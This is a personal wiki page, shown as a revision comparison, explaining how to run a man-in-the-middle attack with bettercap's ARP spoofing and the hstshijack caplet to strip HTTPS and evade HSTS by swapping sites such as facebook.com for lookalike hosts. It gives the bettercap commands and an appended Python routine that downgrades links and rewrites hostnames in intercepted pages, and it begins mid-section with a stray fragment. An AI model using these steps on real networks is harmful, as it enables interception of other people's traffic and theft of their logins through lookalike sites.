The gMan nixWiki

Because the mind is made of Teflon...

hack_postconnect_bypasshttps

Revision comparison: hack_postconnect_bypasshttps [2020/05/31 17:51] – [HTTPS] gman → hack_postconnect_bypasshttps [2020/05/31 18:09] (current) – [HSTS Hijack] gman
  
  
===== HTTPS Hijack =====
  
MITM attack using a **BetterCap** caplet: hstshijack
net.sniff on
</code>

Run bettercap with the custom spoof caplet:

<code>bettercap -iface [interface name] -caplet /path/to/caplet.cap</code>

Once that caplet is running without errors (it should have turned on arp.spoof, net.probe, net.recon and net.sniff, and the target's traffic should start showing up in the sniffer output), start the hstshijack caplet from the bettercap prompt:
  * Run ``caplets.show`` to list all the caplets bettercap can find.
  * To run a caplet, type its name at the bettercap prompt.
  * If no errors are printed, it executed as expected.
  
----
  
===== HSTS Hijack =====
  
**HSTS: HTTP Strict Transport Security**
  * Modern browsers ship a hard-coded (preload) list of HSTS websites and also remember any site that sent a Strict-Transport-Security header on an earlier https visit. An http URL for such a host is rewritten to https inside the browser before any request is sent (this is a local check done by the browser on the client/target machine).
  * Because the check happens in the browser on the client (target), no plain-http request for those sites ever reaches the network, and the MITM downgrade is defeated.
  
The only way around this is to make the browser think it is loading a different web site, one that has no entry in its HSTS list.
  * Replace every link to an HSTS website with a lookalike hostname.
  * facebook.com replaced with facebook.corn
  * twitter.com replaced with twiter.com
  * These target/replacement pairs are configured in hstshijack.cap.
  
Even with this hack, if the client/target types facebook.com into the address bar, it will NOT work.
  * The browser checks its HSTS list before sending anything, upgrades the request to https and will not load the site over plain http, so there is no http traffic for the proxy to rewrite.
  
It will only work if the client/target reaches the site through a page that was itself loaded over plain http, so the proxy could rewrite the links on it; the page gives the example of a search engine that is not served https-first.
  * Example: google.ie
  * On that search site, search for facebook; the MITM hijack replaces every facebook.com URL in the results with facebook.corn.
  * Even this might not work with updated browsers, which increasingly attempt https first for every site.
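As an added example (not code from this wiki page, from bettercap, or from the hstshijack caplet), the following Python models the two halves of the argument above: the browser's host-keyed HSTS check, which upgrades http:// URLs for known hosts before anything is sent, and the proxy-side rewrite that downgrades links and swaps HSTS hosts for lookalikes the browser has no entry for. The HSTS store, the target/lookalike map and the sample HTML are constructed here, and login.example.org is a hypothetical entry; the store also shows the dynamic path, where a host is remembered from a Strict-Transport-Security header, which goes slightly beyond the page's description of a fixed list.

```python
"""Why a lookalike hostname slips past the browser's HSTS check.

Added example; not code from the wiki page, from bettercap or from the
hstshijack caplet. The HSTS store, the lookalike map and the sample HTML
are constructed here. login.example.org is a hypothetical entry.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# Stand-in for the browser's HSTS store: the shipped preload list plus hosts
# remembered from Strict-Transport-Security headers. Keyed by host name.
HSTS_STORE = {
    "facebook.com": {"include_subdomains": True},
    "twitter.com": {"include_subdomains": True},
    "login.example.org": {"include_subdomains": False},  # hypothetical host
}

# Target -> lookalike pairs in the spirit of hstshijack.cap (assumed values).
LOOKALIKES = {
    "facebook.com": "facebook.corn",
    "twitter.com": "twiter.com",
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def parse_sts_header(value):
    """Parse a Strict-Transport-Security header value into a policy dict."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            policy["max_age"] = int(arg.strip().strip('"'))
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy


def learn_sts(store, host, header_value):
    """Record a policy after an https response, as a browser does.

    max-age=0 deletes the entry; a header without max-age is ignored.
    """
    policy = parse_sts_header(header_value)
    host = host.lower()
    if policy["max_age"] is None:
        return store
    if policy["max_age"] == 0:
        store.pop(host, None)
    else:
        store[host] = {"include_subdomains": policy["include_subdomains"]}
    return store


def hsts_applies(host, store=HSTS_STORE):
    """True if the browser would force https for this exact host.

    Walks from the full host up through its parent domains; a parent entry
    only counts when it carries includeSubDomains.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        policy = store.get(".".join(labels[i:]))
        if policy is not None and (i == 0 or policy["include_subdomains"]):
            return True
    return False


def browser_scheme(url, store=HSTS_STORE):
    """Scheme the browser actually uses when navigating to url."""
    parts = urlsplit(url)
    if parts.scheme == "http" and hsts_applies(parts.hostname or "", store):
        return "https"  # upgraded internally; no http request ever leaves
    return parts.scheme


def rewrite_host(host, lookalikes=LOOKALIKES):
    """Swap a target domain (or any of its subdomains) for its lookalike."""
    for target, replacement in lookalikes.items():
        if host == target:
            return replacement
        if host.endswith("." + target):
            return host[: -len(target)] + replacement
    return host


def strip_and_rewrite(html, lookalikes=LOOKALIKES):
    """What the proxy does to a page it can intercept: downgrade every link
    to http and replace HSTS hosts with lookalikes the browser has no entry
    for, so the target's next click stays on plain http through the proxy."""
    def fix(match):
        parts = urlsplit(match.group(0))
        host = rewrite_host(parts.hostname or "", lookalikes)
        netloc = host if parts.port is None else f"{host}:{parts.port}"
        return urlunsplit(("http", netloc, parts.path, parts.query, parts.fragment))
    return URL_RE.sub(fix, html)


if __name__ == "__main__":
    page = '<a href="https://www.facebook.com/login">Facebook</a>'  # constructed
    print(strip_and_rewrite(page))
    for u in ("http://facebook.com/", "http://m.facebook.com/", "http://facebook.corn/"):
        print(u, "->", browser_scheme(u))
```

Running it shows the point of the section: a rewritten link to www.facebook.corn is loaded over http, while a typed or remembered facebook.com (and any subdomain, because of includeSubDomains) is upgraded to https before the proxy ever sees a request.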

----
  
hack_postconnect_bypasshttps.1590947472.txt.gz · Last modified: by gman